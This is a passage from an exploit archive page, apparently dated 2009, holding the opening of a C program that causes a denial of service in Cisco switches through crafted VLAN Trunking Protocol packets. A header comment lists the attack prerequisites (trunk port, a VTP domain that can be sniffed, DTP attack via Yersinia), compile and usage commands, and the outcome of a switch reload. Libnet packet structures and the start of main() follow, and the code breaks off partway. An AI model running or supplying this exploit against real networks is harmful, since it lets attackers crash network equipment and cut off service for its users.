1 /*DoS code for Cisco VLAN Trunking Protocol Vulnerability
2 *
3 *vulerability discription:
4 *http://www.cisco.com/warp/public/707/cisco−sr−20081105−vtp.shtml
5 *
6 *To Known:
7 * 1.the switch must in Server/Client Mode.
8 * 2.the port ,attacker connected,must be in trunk Mode.
9 * Cisco Ethernet ports with no configuration are not
10 * in trunk.but trunk mode can be obtained through DTP
11 * attack by Yersinia.
12 * 3.you must known the vtp domain,this can be sniffed
13 * 4.some codes are from Yersinia.
14 *
15 *Result:
16 * switch reload.
17 *
18 *
19 *Compile:
20 * gcc −o vtp ‘libnet−config −−libs‘ vtp.c
21 *
22 *Usage:vtp −i <interface> −d <vtp_domain>
23 *
24 *Contact: showrun.lee[AT]gmail.com
25 *http://sh0wrun.blogspot.com/
26 */
27 #include <libnet.h>
28 #include <stdio.h>
29 #include <stdlib.h>
30
31 #define VTP_DOMAIN_SIZE 32
32 #define VTP_TIMESTAMP_SIZE 12
33
34 struct vtp_summary {
35 u_int8_t version;
36 u_int8_t code;
37 u_int8_t followers;
38 u_int8_t dom_len;
39 u_int8_t domain[VTP_DOMAIN_SIZE];
40 u_int32_t revision;
41 u_int32_t updater;
42 u_int8_t timestamp[VTP_TIMESTAMP_SIZE];
43 u_int8_t md5[16];
44 };
45
46 struct vtp_subset {
47 u_int8_t version;
48 u_int8_t code;
49 u_int8_t seq;
50 u_int8_t dom_len;
51 u_int8_t domain[VTP_DOMAIN_SIZE];
52 u_int32_t revision;
Page 1/4
Cisco VLAN Trunking Protocol Denial of Service Exploit
showrun
01/14/2009
53 };
54
55 void usage( char *s) {
56 printf("%s −i <interface> −d <vtp domain>\n",s);
57 exit (1);
58 }
59
60 int main( int argc, char *argv[] )
61 {
62 int opt,k=0;
63 extern char *optarg;
64 libnet_ptag_t t;
65 libnet_t *lhandler;
66 u_int32_t vtp_len=0, sent;
67 struct vtp_summary *vtp_summ;
68 struct vtp_subset *vtp_sub;
69 u_int8_t *vtp_packet,*vtp_packet2, *aux;
70 u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
71 u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };